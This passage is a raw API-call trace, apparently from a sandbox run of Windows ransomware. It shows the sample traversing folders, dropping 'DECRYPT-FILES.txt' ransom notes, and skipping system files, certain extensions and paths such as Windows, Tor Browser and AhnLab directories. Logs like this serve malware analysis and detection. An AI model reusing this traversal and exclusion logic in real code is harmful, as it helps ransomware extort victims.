0x424 [0071.400] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.401] CloseHandle (hObject=0x424) returned 1 [0071.401] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\") returned 54 [0071.401] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpString2="*" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*" [0071.401] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.401] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.401] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.401] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.401] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.401] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c8e3e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.401] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.401] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c8e3e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.402] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.402] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.402] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.402] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.402] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.402] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\") returned 54 [0071.402] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.402] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Program Files\\Microsoft SQL Server Compact Edition\\" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\" [0071.402] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\jkbimi8.tmp") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\jkbimi8.tmp" [0071.402] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\jkbimi8.tmp" (normalized: "c:\\program files\\microsoft sql server compact edition\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.402] CloseHandle (hObject=0x0) returned 0 [0071.402] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.402] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95f8cc20, ftCreationTime.dwHighDateTime=0x1d57425, ftLastAccessTime.dwLowDateTime=0x18c85080, ftLastAccessTime.dwHighDateTime=0x1d50f7c, ftLastWriteTime.dwLowDateTime=0x18c85080, ftLastWriteTime.dwHighDateTime=0x1d50f7c, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="pspbouquetcontrary.exe", cAlternateFileName="PSPBOU~1.EXE")) returned 1 [0071.402] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="DECRYPT-FILES.txt") returned 1 [0071.402] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="autorun.inf") returned 1 [0071.402] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="boot.ini") returned 1 [0071.403] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="desktop.ini") returned 1 [0071.403] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="ntuser.dat") returned 1 [0071.403] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="iconcache.db") returned 1 [0071.403] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="bootsect.bak") returned 1 [0071.403] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="ntuser.dat.log") returned 1 [0071.403] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="thumbs.db") returned -1 [0071.403] lstrcmpiW (lpString1="pspbouquetcontrary.exe", lpString2="Bootfont.bin") returned 1 [0071.403] lstrlenW (lpString="pspbouquetcontrary.exe") returned 22 [0071.403] lstrcmpiW (lpString1="exe", lpString2="lnk") returned -1 [0071.403] lstrcmpiW (lpString1="exe", lpString2="exe") returned 0 [0071.403] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0071.403] lstrcmpW (lpString1="v3.5", lpString2=".") returned 1 [0071.403] lstrcmpW (lpString1="v3.5", lpString2="..") returned 1 [0071.403] lstrcatW (in: lpString1="v3.5", lpString2="\\" | out: lpString1="v3.5\\") returned="v3.5\\" [0071.403] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpString2="v3.5\\" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\" [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="SQL") returned="SQL Server Compact Edition\\v3.5\\" [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\Program Files") returned="\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\" [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch=":\\Windows") returned 0x0 [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\Games\\") returned 0x0 [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\All Users") returned 0x0 [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="AhnLab") returned 0x0 [0071.403] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.403] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\") returned 59 [0071.403] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.403] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\\\jkbimi8.tmp") returned 71 [0071.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\\\jkbimi8.tmp" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0071.407] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\") returned 59 [0071.407] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.407] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\\\DECRYPT-FILES.txt") returned 77 [0071.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\\\DECRYPT-FILES.txt" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0071.407] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0071.408] CloseHandle (hObject=0x434) returned 1 [0071.408] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\") returned 59 [0071.408] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpString2="*" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*" [0071.408] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0071.408] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.409] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.409] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.409] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.409] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c8e3e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.409] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.409] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0071.409] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0071.409] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0071.409] lstrcatW (in: lpString1="Desktop", lpString2="\\" | out: lpString1="Desktop\\") returned="Desktop\\" [0071.409] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpString2="Desktop\\" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\" [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="SQL") returned="SQL Server Compact Edition\\v3.5\\Desktop\\" [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\Program Files") returned="\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\" [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch=":\\Windows") returned 0x0 [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\Games\\") returned 0x0 [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\All Users") returned 0x0 [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="AhnLab") returned 0x0 [0071.409] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.409] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\") returned 67 [0071.409] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.409] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\\\jkbimi8.tmp") returned 79 [0071.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\\\jkbimi8.tmp" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x438 [0071.410] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\") returned 67 [0071.410] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.410] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\\\DECRYPT-FILES.txt") returned 85 [0071.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\\\DECRYPT-FILES.txt" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0071.410] WriteFile (in: hFile=0x43c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0071.411] CloseHandle (hObject=0x43c) returned 1 [0071.411] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\") returned 67 [0071.411] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpString2="*" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*" [0071.411] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c58 [0071.412] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.412] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.412] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.412] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.412] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c8e3e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.412] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.412] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c8e3e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.412] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.412] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.412] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.412] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.412] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.412] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.412] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.412] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.412] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.412] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.412] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.412] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.412] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.412] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.412] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.412] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\") returned 67 [0071.412] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.412] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\" [0071.412] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\jkbimi8.tmp") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\jkbimi8.tmp" [0071.412] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\jkbimi8.tmp" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.413] CloseHandle (hObject=0x0) returned 0 [0071.413] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.413] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c8e3e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.413] FindClose (in: hFindFile=0x5f8c58 | out: hFindFile=0x5f8c58) returned 1 [0071.413] CloseHandle (hObject=0x438) returned 1 [0071.413] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c8e3e0, 